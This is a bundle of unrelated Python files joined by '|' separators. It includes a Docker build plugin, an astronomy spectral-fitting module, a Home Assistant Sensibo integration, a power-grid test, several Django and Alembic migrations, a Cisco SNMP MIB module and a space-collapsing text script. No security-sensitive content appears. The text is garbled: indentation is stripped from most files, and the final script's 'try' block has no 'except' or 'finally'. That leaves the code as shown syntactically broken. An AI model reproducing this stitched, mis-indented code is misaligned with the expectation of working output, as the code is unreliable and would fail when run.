"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
It returns the content of the Dockerfile and thereby displays it in the results.
"""
from dockerfile_parse import DockerfileParser
from atomic_reactor.plugin import PreBuildPlugin
class CpDockerfilePlugin(PreBuildPlugin):
key = "dockerfile_content"
def __init__(self, tasker, workflow):
"""
constructor
:param tasker: DockerTasker instance
:param workflow: DockerBuildWorkflow instance
:return:
"""
# call parent constructor
super(CpDockerfilePlugin, self).__init__(tasker, workflow)
def run(self):
"""
        Try to open the Dockerfile; return an error message if it cannot be read.
"""
try:
return DockerfileParser(self.workflow.builder.df_path).content
except (IOError, OSError) as ex:
return "Couldn't retrieve dockerfile: %r" % ex
|
# -*- coding: UTF-8 -*-
__author__ = 'Jens-Kristian Krogager'
from builtins import input
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from scipy.interpolate import UnivariateSpline as spline
from scipy.interpolate import RectBivariateSpline as spline2d
import os
from VoigtFit.funcs.voigt import evaluate_profile
root_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.dirname(root_path)
datafile = os.path.join(root_path, 'static', 'telluric_em_abs.npz')
telluric_data = np.load(datafile)
def get_FWHM(y, x=None):
"""
Measure the FWHM of the profile given as `y`.
If `x` is given, then report the FWHM in terms of data units
defined by the `x` array. Otherwise, report pixel units.
Parameters
----------
y : np.ndarray, shape (N)
Input profile whose FWHM should be determined.
x : np.ndarray, shape (N) [default = None]
Input data units, must be same shape as `y`.
Returns
-------
fwhm : float
FWHM of `y` in units of pixels.
If `x` is given, the FWHM is returned in data units
corresponding to `x`.
"""
if x is None:
x = np.arange(len(y))
half = max(y)/2.0
signs = np.sign(np.add(y, -half))
    zero_crossings = (signs[0:-1] != signs[1:])
    zero_crossings_i = np.where(zero_crossings)[0]
    if np.sum(zero_crossings) > 2:
        raise ValueError('Invalid profile! More than 2 crossings detected.')
    elif np.sum(zero_crossings) < 2:
        raise ValueError('Invalid profile! Fewer than 2 crossings detected.')
halfmax_x = list()
for i in zero_crossings_i:
x_i = x[i] + (x[i+1] - x[i]) * ((half - y[i]) / (y[i+1] - y[i]))
halfmax_x.append(x_i)
fwhm = halfmax_x[1] - halfmax_x[0]
return fwhm
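
# Usage sketch (illustrative values, not from the original source): a Gaussian
# with standard deviation sigma has FWHM = 2*sqrt(2*ln 2)*sigma ~ 2.3548*sigma,
# which get_FWHM should recover:
# >>> x = np.linspace(-5., 5., 1001)
# >>> y = np.exp(-x**2 / 2.)    # sigma = 1
# >>> get_FWHM(y, x)            # ~ 2.3548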
def linfunc(x, a, b):
"""Linear fitting function of first order."""
return a*x + b
def load_lsf(lsf_fname, wl, nsub=1):
"""
Load a Line-Spread Function table following format from HST:
First line gives wavelength in Angstrom and the column below
each given wavelength defines the kernel in pixel space::
wl1 wl2 wl3 ... wlN
lsf11 lsf21 lsf31 ... lsfN1
lsf12 lsf22 lsf32 ... lsfN2
:
:
lsf1M lsf2M lsf3M ... lsfNM
Parameters
----------
lsf_fname : string
The filename containing the LSF data.
wl : array like, shape (N)
The wavelength grid onto which the LSF will be evaluated
nsub : integer [default = 1]
Kernel subsampling factor relative to the data.
        This is only used if the resolution is given as an LSF file.
Returns
-------
kernel : np.array, shape(N, M)
A grid of interpolated LSF evaluated at each given input wavelength
of the array `wl` of shape N, where M is the number of pixels in the LSF.
Notes
-----
The output kernel is transposed with respect to the input format
for ease of computation in the convolution since indexing is faster
along rows than columns.
"""
if nsub > 1:
wl = np.linspace(wl.min(), wl.max(), nsub*len(wl))
lsf_tab = np.loadtxt(lsf_fname)
# Get the wavelength array from the first line in the file:
lsf_wl = lsf_tab[0]
# The LSF data is the resulting table excluding the first line:
lsf = lsf_tab[1:, :]
# Normalize the LSF:
lsf_norm = np.sum(lsf, axis=0)
lsf = lsf/lsf_norm
    # Make an array of pixel indices:
lsf_pix = np.arange(lsf.shape[0])
# Linearly interpolate the LSF grid:
LSF = spline2d(lsf_pix, lsf_wl, lsf, kx=1, ky=1)
kernel = LSF(lsf_pix, wl).T
return kernel
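
# Usage sketch (the file name is hypothetical): interpolating an HST-style LSF
# table onto a wavelength grid with 2x subsampling:
# >>> wl = np.linspace(1150., 1450., 1000)
# >>> kernel = load_lsf('COS_G130M_lsf.dat', wl, nsub=2)
# >>> kernel.shape    # (2*len(wl), M), one interpolated kernel row per pixel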
class Region():
def __init__(self, velspan, specID, line=None):
"""
A Region contains the fitting data, exclusion mask and line information.
The class is instantiated with the velocity span, `velspan`, and a spectral ID
pointing to the raw data chunk from `DataSet.data`,
and can include a :class:`dataset.Line` instance for the first line
belonging to the region.
.. rubric:: Attributes
velspan : Tuple(float, float)
The velocity ranges used for the fitting region. Given as a range by a tuple of (lower, upper).
lines : list(:class:`dataset.Line`)
A list of Lines defined in the region.
label : str
A LaTeX label describing the lines in the region for plotting purposes.
res : float
Spectral resolution of the region in km/s.
wl : array_like, shape (N)
        Data array of wavelengths in Ångström.
flux : array_like, shape (N)
Data array of fluxes (normalized if :attr:`normalized` is `True`).
err : array_like, shape (N)
Array of uncertainties for each flux element.
normalized : bool
        `True` if the data in the region are normalized.
mask : array_like, shape (N)
Exclusion mask for the region:
0/`False` = pixel is *not* included in the fit.
1/`True` = pixel is included in the fit.
new_mask : bool
Internal parameter for :meth:`VoigtFit.DataSet.prepare_dataset`.
If `True`, an interactive masking process will be initiated in the
preparation stage.
cont_err : float
An estimate of the uncertainty in the continuum fit.
specID : str
A spectral identifier to point back to the raw data chunk.
"""
if hasattr(velspan, '__iter__'):
if len(velspan) == 2:
pass
else:
raise ValueError("argument 'velspan' must have two values! not %i" % len(velspan))
else:
velspan = (-1.*np.abs(velspan), np.abs(velspan))
self.velspan = velspan
self.specID = specID
if line:
self.lines = [line]
else:
self.lines = list()
self.label = ''
self.res = None
self.err = None
self.flux = None
self.wl = None
self.normalized = False
self.cont_err = 0.
self.mask = None
self.new_mask = False
self.kernel = None
self.kernel_fwhm = None
self.kernel_nsub = 1
def add_data_to_region(self, data_chunk, cutout):
"""
Define the spectral data for the fitting region.
Parameters
----------
data_chunk : dict()
A `data_chunk` as defined in the data structure of :meth:`DataSet.data
<VoigtFit.DataSet.add_data>`.
cutout : bool array
A boolean array defining the subset of the `data_chunk` which makes up the fitting region.
"""
self.res = data_chunk['res']
self.err = data_chunk['error'][cutout]
self.flux = data_chunk['flux'][cutout]
self.wl = data_chunk['wl'][cutout]
self.normalized = data_chunk['norm']
self.cont_err = 0.
self.mask = data_chunk['mask'][cutout]
self.kernel_nsub = data_chunk['nsub']
if np.sum(self.mask) == len(self.mask):
# If all pixels are 1 in the given mask,
# let the user define new_mask in `prepare_dataset`:
self.new_mask = True
else:
self.new_mask = False
if isinstance(self.res, str):
self.kernel = load_lsf(self.res, self.wl, nsub=self.kernel_nsub)
i0 = self.kernel.shape[0] // self.kernel_nsub // 2
kernel_0 = self.kernel[i0]
# Get FWHM in pixel units:
fwhm = get_FWHM(kernel_0)
lambda0 = self.wl[i0]
dx0 = np.diff(self.wl)[i0]
# Calculate FWHM in km/s:
self.kernel_fwhm = 299792.458 / lambda0 * (fwhm * dx0)
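            # Worked example (illustrative numbers): a kernel FWHM of 3 pixels
            # at lambda0 = 5000 Å with dx0 = 0.05 Å/pix gives
            # 299792.458 / 5000 * (3 * 0.05) ~ 9.0 km/s.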
else:
# `res` is a float, already given as FWHM in km/s
self.kernel = float(self.res)
self.kernel_fwhm = float(self.res)
def add_line(self, line):
"""Add a new :class:`dataset.Line` to the fitting region."""
self.lines.append(line)
def has_line(self, line_tag):
"""Return `True` if a line with the given `line_tag` is defined in the region."""
for line in self.lines:
if line.tag == line_tag:
return True
return False
def has_active_lines(self):
"""Return `True` is at least one line in the region is active."""
active_lines = [line.active for line in self.lines]
if np.any(active_lines):
return True
return False
def remove_line(self, line_tag):
"""Remove absorption line with the given `line_tag` from the region."""
if self.has_line(line_tag):
for num, line in enumerate(self.lines):
if line.tag == line_tag:
num_to_remove = num
self.lines.pop(num_to_remove)
def normalize(self, plot=True, norm_method='linear', z_sys=None):
"""
Normalize the region if the data are not already normalized.
Choose from two methods:
1: define left and right continuum regions
and fit a linear continuum.
2: define the continuum as a range of points
and use spline interpolation to infer the
continuum.
        If `z_sys` is not `None`, show the region in velocity space
        instead of wavelength space.
"""
if norm_method in ['linear', 'spline']:
pass
else:
err_msg = "Invalid norm_method: %r" % norm_method
raise ValueError(err_msg)
plt.close('all')
plt.figure()
x = self.wl.copy()
x_label = u"Wavelength [Å]"
if z_sys is not None:
# Calculate velocity:
l0 = self.lines[0].l0 * (z_sys + 1.)
x = (x - l0)/l0 * 299792.458
x_label = "Rel. Velocity [km s$^{-1}$]"
dx = 0.1*(x.max() - x.min())
lines_title_string = ", ".join([line.tag for line in self.lines])
plt.xlim(x.min()-dx, x.max()+dx)
plt.ylim(0.8*self.flux.min(), 1.2*self.flux.max())
plt.plot(x, self.flux, color='k', drawstyle='steps-mid',
label=lines_title_string)
plt.xlabel(x_label)
plt.legend()
if norm_method == 'linear':
# - Normalize by defining a left and right continuum region
print("\n Mark continuum region on the *left* side of the absorption, (left and right boundary)")
plt.title("Mark continuum region on the *left* side of the absorption")
plt.tight_layout()
plt.draw()
bounds = plt.ginput(2, -1)
if len(bounds) != 2:
return 0
left_bound = min(bounds[0][0], bounds[1][0])
right_bound = max(bounds[0][0], bounds[1][0])
if left_bound >= right_bound:
print(" [ERROR] - Left and Right boundaries too small!\n")
return 0
region1 = (x >= left_bound)*(x <= right_bound)
fit_wl = x[region1]
fit_flux = self.flux[region1]
print(" Mark continuum region on the *right* side of the absorption")
plt.title("Mark continuum region on the *right* side of the absorption")
plt.tight_layout()
plt.draw()
bounds = plt.ginput(2)
if len(bounds) != 2:
return 0
left_bound = min(bounds[0][0], bounds[1][0])
right_bound = max(bounds[0][0], bounds[1][0])
if left_bound >= right_bound:
print(" [ERROR] - Left and Right boundaries too small!\n")
return 0
region2 = (x >= left_bound)*(x <= right_bound)
fit_wl = np.concatenate([fit_wl, x[region2]])
fit_flux = np.concatenate([fit_flux, self.flux[region2]])
if len(fit_wl) < 4 or len(fit_flux) < 4:
print(" [ERROR] - Not enough pixels were selected. Select larger regions...\n")
return 0
elif len(fit_wl) != len(fit_flux):
print(" [ERROR] - Something went wrong. The data arrays do not have the same shape!")
print(" Try again...\n")
return 0
popt, pcov = curve_fit(linfunc, fit_wl, fit_flux)
continuum = linfunc(x, *popt)
e_continuum = np.std(fit_flux - linfunc(fit_wl, *popt)) / np.sqrt(len(fit_wl)-2)
elif norm_method == 'spline':
# Normalize by drawing the continuum and perform spline
# interpolation between the points
print("\n Select at least 3 spline points over the whole range to define the continuum")
plt.title("Select at least 3 spline points over the whole range to define the continuum")
plt.tight_layout()
plt.draw()
points = plt.ginput(n=-1, timeout=-1)
if len(points) < 3:
return 0
points = np.array(points)
x_points = points[:, 0]
y_points = points[:, 1]
cont_spline = spline(x_points, y_points)
continuum = cont_spline(x)
e_continuum = np.sqrt(np.median(self.err**2)/len(x_points))
else:
return 0
if plot:
new_flux = self.flux/continuum
new_err = self.err/continuum
if norm_method == 'spline':
plt.plot(x_points, y_points, ls='', color='b', marker='o', alpha=0.8)
else:
plt.axvspan(x[region1].min(), x[region1].max(), color='b', alpha=0.3)
plt.axvspan(x[region2].min(), x[region2].max(), color='b', alpha=0.3)
plt.plot(x, continuum, color='r', ls='--', lw=2., alpha=0.8)
plt.plot(x, continuum+e_continuum, color='r', ls=':', lw=1., alpha=0.8)
plt.plot(x, continuum-e_continuum, color='r', ls=':', lw=1., alpha=0.8)
plt.title("Go back to terminal...")
plt.tight_layout()
plt.draw()
prompt = str(input(" Is normalization correct? (YES/no) "))
if prompt.lower() in ['', 'y', 'yes']:
self.flux = new_flux
self.err = new_err
self.cont_err = e_continuum / np.median(continuum)
self.normalized = True
return 1
else:
return 0
else:
self.flux = self.flux / continuum
self.err = self.err / continuum
self.cont_err = e_continuum / np.median(continuum)
self.normalized = True
return 1
def define_mask(self, z=None, dataset=None, telluric=True, z_sys=None):
"""
Use an interactive window to define the mask for the region.
Parameters
----------
z : float [default = None]
If a redshift is given, the lines in the region are shown as vertical lines
at the given redshift.
dataset : :class:`VoigtFit.DataSet` [default = None]
A dataset with components defined for the lines in the region.
If a dataset is passed, the components of the lines in the region are shown.
telluric : bool [default = True]
Show telluric absorption and sky emission line templates during the masking.
z_sys : float [default = None]
If a systemic redshift is given, the region is displayed in velocity space
relative to the given systemic redshift instead of in wavelength space.
"""
plt.close('all')
x = self.wl.copy()
x_label = u"Wavelength [Å]"
if z_sys is not None:
# Calculate velocity:
l_ref = self.lines[0].l0 * (z_sys + 1.)
x = (x - l_ref) / l_ref * 299792.458
x_label = u"Rel. Velocity [${\\rm km\\ s^{-1}}$]"
plt.xlim(x.min(), x.max())
# plt.ylim(max(0, 0.8*self.flux.min()), 1.2)
lines_title = ", ".join([line.tag for line in self.lines])
masked_spectrum = np.ma.masked_where(self.mask, self.flux)
plt.plot(x, self.flux, color='k', drawstyle='steps-mid', lw=0.5,
label=lines_title)
plt.xlabel(x_label)
mask_line = plt.plot(x, masked_spectrum, color='r', lw=1.5,
drawstyle='steps-mid', zorder=0)
plt.legend()
if telluric:
x_T = telluric_data['wl']
cutout = (x_T > self.wl.min()) * (x_T < self.wl.max())
flux_T = telluric_data['em'][cutout]
abs_T = telluric_data['abs'][cutout]
x_T = x_T[cutout]
if self.normalized:
cont = 1.
else:
cont = np.median(self.flux)
if z_sys is not None:
x_T = (x_T - l_ref) / l_ref * 299792.458
plt.plot(x_T, abs_T*1.2*cont, color='crimson', alpha=0.7, lw=0.5)
# -- Test if telluric template is defined in this region:
if len(flux_T) > 0 and (flux_T.max() != 0):
plt.plot(x_T, (flux_T / flux_T.max() + 1.2)*cont,
color='orange', alpha=0.7, lw=0.5)
if z is not None:
for line in self.lines:
# Load line properties
l0, f, gam = line.get_properties()
if dataset is not None:
ion = line.ion
if ion in dataset.components:
n_comp = len(dataset.components[ion])
else:
n_comp = 0
ion = ion.replace('*', 'x')
for n in range(n_comp):
z = dataset.pars['z%i_%s' % (n, ion)].value
if z_sys is not None:
plt.axvline((l0*(z+1) - l_ref) / l_ref * 299792.458,
ls=':', color='r', lw=0.4)
else:
plt.axvline(l0*(z+1), ls=':', color='r', lw=0.4)
else:
if z_sys is not None:
plt.axvline((l0*(z+1) - l_ref)/l_ref * 299792.458,
ls=':', color='r', lw=0.4)
else:
plt.axvline(l0*(z+1), ls=':', color='r', lw=0.4)
plt.title("Mark left and right boundary of regions to mask\n[press ENTER when done]")
print("\n\n Mark left and right boundary of regions to mask [press ENTER when done]")
plt.tight_layout()
plt.draw()
ok = 0
mask_vlines = list()
while ok >= 0:
sel = plt.ginput(0, timeout=-1)
if len(sel) > 0 and len(sel) % 2 == 0:
mask = self.mask.copy()
sel = np.array(sel)
selections = np.column_stack([sel[::2, 0], sel[1::2, 0]])
for x1, x2 in selections:
cutout = (x >= x1)*(x <= x2)
mask[cutout] = False
mask_vlines.append(plt.axvline(x1, color='r', ls='--'))
mask_vlines.append(plt.axvline(x2, color='r', ls='--'))
masked_spectrum = np.ma.masked_where(mask, self.flux)
mask_line = plt.plot(x, masked_spectrum, color='r', drawstyle='steps-mid')
plt.draw()
prompt = str(input(" Are the masked regions correct? (YES/no/clear)"))
if prompt.lower() in ['', 'y', 'yes']:
ok = -1
self.mask = mask
self.new_mask = False
elif prompt.lower() in ['c', 'clear']:
ok = 0
self.mask = np.ones_like(mask, dtype=bool)
for linesegment in mask_line:
linesegment.remove()
mask_line = list()
for linesegment in mask_vlines:
linesegment.remove()
mask_vlines = list()
else:
self.mask = mask
ok += 1
elif len(sel) == 0:
print("\n No masks were defined.")
prompt = str(input(" Continue? (yes/no)"))
if prompt.lower() in ['', 'y', 'yes']:
ok = -1
self.new_mask = False
else:
ok += 1
plt.close()
def set_mask(self, mask):
err_msg = " Mask must have same size as region!"
assert len(mask) == len(self.flux), err_msg
self.mask = mask
def clear_mask(self):
"""Clear the already defined mask in the region."""
self.mask = np.ones_like(self.wl, dtype=bool)
self.new_mask = True
def unpack(self):
"""Return the data of the region (wl, flux, error, mask)"""
return (self.wl, self.flux, self.err, self.mask)
def is_normalized(self):
"""Return `True` if the region data is normalized."""
return self.normalized
def set_label(self, text):
"""Set descriptive text label for the given region."""
self.label = text
def generate_label(self, active_only=True, ignore_finelines=True):
"""Automatically generate a descriptive label for the region."""
transition_lines = list()
if active_only and not ignore_finelines:
for line in self.lines:
if line.active is True:
transition_lines.append(line.tag)
elif active_only and ignore_finelines:
for line in self.lines:
if line.active is True and line.ion[-1].isupper():
transition_lines.append(line.tag)
elif not active_only and ignore_finelines:
for line in self.lines:
if line.ion[-1].isupper():
transition_lines.append(line.tag)
else:
for line in self.lines:
transition_lines.append(line.tag)
all_trans_str = [r"${\rm "+trans.replace('_', r'\ \lambda')+"}$"
for trans in transition_lines]
line_string = "\n".join(all_trans_str)
self.label = line_string
def get_velocity(self, z_sys, line=None):
"""
Return the relative velocities of the region,
        with respect to the systemic redshift of the given `line`.
"""
if line is None:
line = self.lines[0]
elif isinstance(line, str):
line_tags = [this_line.tag for this_line in self.lines]
if line in line_tags:
idx = line_tags.index(line)
line = self.lines[idx]
else:
assert line in self.lines, "The line is not defined in the region!"
lcen = line.l0 * (z_sys + 1)
vel = (self.wl - lcen) / lcen * 299792.458
return vel
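
    # Usage sketch (illustrative values): for a line with rest wavelength
    # l0 = 1302.17 Å at z_sys = 2.0, the line centre is 1302.17 * 3.0 =
    # 3906.51 Å, so a pixel at 3907.0 Å maps to
    # (3907.0 - 3906.51) / 3906.51 * 299792.458 ~ +37.6 km/s.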
def evaluate_region(self, pars, wl=None, z_sys=None, sampling=3, lines=None):
if lines is None:
lines = self.lines
if wl is None:
wl = self.wl
profile = evaluate_profile(wl, pars, lines, self.kernel,
z_sys=z_sys, sampling=sampling, kernel_nsub=self.kernel_nsub)
return profile
|
"""The sensibo component."""
from __future__ import annotations
import asyncio
import logging
import aiohttp
import async_timeout
import pysensibo
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import _INITIAL_FETCH_FIELDS, DOMAIN, PLATFORMS, TIMEOUT
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Sensibo from a config entry."""
client = pysensibo.SensiboClient(
entry.data[CONF_API_KEY], session=async_get_clientsession(hass), timeout=TIMEOUT
)
devicelist = []
try:
async with async_timeout.timeout(TIMEOUT):
for dev in await client.async_get_devices(_INITIAL_FETCH_FIELDS):
devicelist.append(dev)
except (
aiohttp.client_exceptions.ClientConnectorError,
asyncio.TimeoutError,
pysensibo.SensiboError,
) as err:
raise ConfigEntryNotReady(
f"Failed to get devices from Sensibo servers: {err}"
) from err
if not devicelist:
return False
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
"devices": devicelist,
"client": client,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
_LOGGER.debug("Loaded entry for %s", entry.title)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload Sensibo config entry."""
if await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
del hass.data[DOMAIN][entry.entry_id]
if not hass.data[DOMAIN]:
del hass.data[DOMAIN]
_LOGGER.debug("Unloaded entry for %s", entry.title)
return True
return False
|
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import os
from multiprocessing import Pool
from GridCal.Engine.IO.file_handler import FileOpen
from GridCal.Engine.Simulations.PowerFlow.power_flow_worker import SolverType, multi_island_pf
from GridCal.Engine.Simulations.PowerFlow.power_flow_driver import PowerFlowOptions, PowerFlowDriver
def test_api_multi_core_starmap():
"""
Test the pool.starmap function together with GridCal
"""
file_name = os.path.join('..', '..', 'Grids_and_profiles', 'grids', 'IEEE 30 Bus with storage.xlsx')
batch_size = 100
grid = FileOpen(file_name).open()
print('\n\n', grid.name)
options = PowerFlowOptions(SolverType.NR, verbose=False)
power_flow = PowerFlowDriver(grid, options)
power_flow.run()
# create instances of the of the power flow simulation given the grid
print('running...')
pool = Pool()
results = pool.starmap(multi_island_pf, [(grid, options, 0)] * batch_size)
if __name__ == '__main__':
test_api_multi_core_starmap()
|
# Generated by Django 2.2.11 on 2020-03-24 17:48
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('facility', '0021_auto_20200324_0756'),
]
operations = [
migrations.CreateModel(
name='PatientTeleConsultation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('symptoms', multiselectfield.db.fields.MultiSelectField(choices=[(1, 'NO'), (2, 'FEVER'), (3, 'SORE THROAT'), (4, 'COUGH'), (5, 'BREATHLESSNESS')], max_length=9)),
('other_symptoms', models.TextField(blank=True, null=True)),
('reason', models.TextField(blank=True, null=True, verbose_name='Reason for calling')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PatientRegistration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('age', models.PositiveIntegerField()),
('gender', models.IntegerField(choices=[(1, 'Male'), (2, 'Female'), (3, 'Other')])),
('phone_number', models.CharField(max_length=14, validators=[django.core.validators.RegexValidator(code='invalid_mobile', message='Please Enter 10/11 digit mobile number or landline as 0<std code><phone number>', regex='^((\\+91|91|0)[\\- ]{0,1})?[456789]\\d{9}$')])),
('contact_with_carrier', models.BooleanField(verbose_name='Contact with a Covid19 carrier')),
('medical_history', multiselectfield.db.fields.MultiSelectField(choices=[(1, 'NO'), (2, 'Diabetes'), (3, 'Heart Disease'), (4, 'HyperTension'), (5, 'Kidney Diseases')], max_length=9)),
('medical_history_details', models.TextField(blank=True, null=True)),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
from .dicomexplorer_old import DicomExplorer
|
#
# PySNMP MIB module CISCO-MEDIA-QUALITY-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-MEDIA-QUALITY-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:50:04 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsUnion")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
NotificationGroup, AgentCapabilities, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "AgentCapabilities", "ModuleCompliance")
Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, Bits, Integer32, IpAddress, Unsigned32, MibIdentifier, iso, ObjectIdentity, ModuleIdentity, Counter32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "Bits", "Integer32", "IpAddress", "Unsigned32", "MibIdentifier", "iso", "ObjectIdentity", "ModuleIdentity", "Counter32", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoMediaQualityCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 604))
ciscoMediaQualityCapability.setRevisions(('2011-09-23 00:00', '2011-04-15 00:00',))
if mibBuilder.loadTexts: ciscoMediaQualityCapability.setLastUpdated('201109230000Z')
if mibBuilder.loadTexts: ciscoMediaQualityCapability.setOrganization('Cisco Systems, Inc.')
ciscoMediaQualityCapabilityV152R01 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 604, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R01 = ciscoMediaQualityCapabilityV152R01.setProductRelease('OS=IOS\n OSVERSION=15.2(1)T\n PLATFORM=c29xx,c3925,c3945,c3925E,c3945E\n INTERFACE=None')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R01 = ciscoMediaQualityCapabilityV152R01.setStatus('current')
ciscoMediaQualityCapabilityV152R02 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 604, 2))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R02 = ciscoMediaQualityCapabilityV152R02.setProductRelease('OS=IOS\n OSVERSION=15.2(2)T\n PLATFORM=c28xx,c3825,c3845,c29xx,c3925,c3945,c3925E,c3945E\n INTERFACE=None')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMediaQualityCapabilityV152R02 = ciscoMediaQualityCapabilityV152R02.setStatus('current')
mibBuilder.exportSymbols("CISCO-MEDIA-QUALITY-CAPABILITY", ciscoMediaQualityCapabilityV152R01=ciscoMediaQualityCapabilityV152R01, ciscoMediaQualityCapabilityV152R02=ciscoMediaQualityCapabilityV152R02, PYSNMP_MODULE_ID=ciscoMediaQualityCapability, ciscoMediaQualityCapability=ciscoMediaQualityCapability)
|
"""add in dutycycle gt
Revision ID: 9975c0e10837
Revises: 950cd7f3122a
Create Date: 2019-05-21 20:37:39.785501
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9975c0e10837'
down_revision = '950cd7f3122a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('DutyCycleGT',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=512), nullable=False),
sa.Column('trace', sa.String(length=512), nullable=False),
sa.Column('index', sa.String(length=32), nullable=False),
sa.Column('active', sa.String(length=32), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('DutyCycleGT')
# ### end Alembic commands ###
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Renames is_declining_review property
Revision ID: 8e530ce276a
Revises: 321f1d702be0
Create Date: 2015-03-03 16:43:22.942740
"""
# revision identifiers, used by Alembic.
revision = '8e530ce276a'
down_revision = '321f1d702be0'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column(
'cycle_task_entries', 'is_declining_review', new_column_name='_is_declining_review',
type_=sa.Boolean())
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column(
'cycle_task_entries', '_is_declining_review', new_column_name='is_declining_review',
type_=sa.Boolean())
### end Alembic commands ###
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-01 22:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('x', '0003_auto_20151226_2128'),
]
operations = [
migrations.AddField(
model_name='gpior2',
name='toggle_state',
field=models.CharField(choices=[(b'ON', b'ON'), (b'OFF', b'OFF')], default=b'', max_length=20),
),
migrations.AlterField(
model_name='gpior2',
name='pin',
field=models.IntegerField(choices=[(2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (19, 19), (18, 18), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27)]),
),
]
|
#!/usr/bin/python3
"""
SQLite Database handler in Python with PHP-MySQLi like syntax
start date: 19/10/2015
Email: muntashir.islam96@gmail.com
"""
from sqlite.sqlite import SQLite

__title__ = 'sqlite'
__version__ = '0.2.0'
__author__ = 'Muntashir Al-Islam'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2015 Muntashir Al-Islam'
|
import io

f = input('Enter valid file full pathname: ')
text = ''
try:
    with io.open(f, 'r', encoding='utf8') as opf:
        text11 = opf.read()
    i = 0
    while i < len(text11):
        if text11[i] == ' ':
            # Collapse a whole run of consecutive spaces into a single space.
            j = i
            while j < len(text11) and text11[j] == ' ':
                j += 1
            text += ' '
            i = j
        else:
            text += text11[i]
            i += 1
    print('Text saved is: ')
    print(text)
    f = f[:-4] + '-spaceremove.txt'
    with io.open(f, 'w', encoding='utf8') as sf:
        sf.write(text)
    print('File removed of consecutive blank spaces and saved with name: ', f)
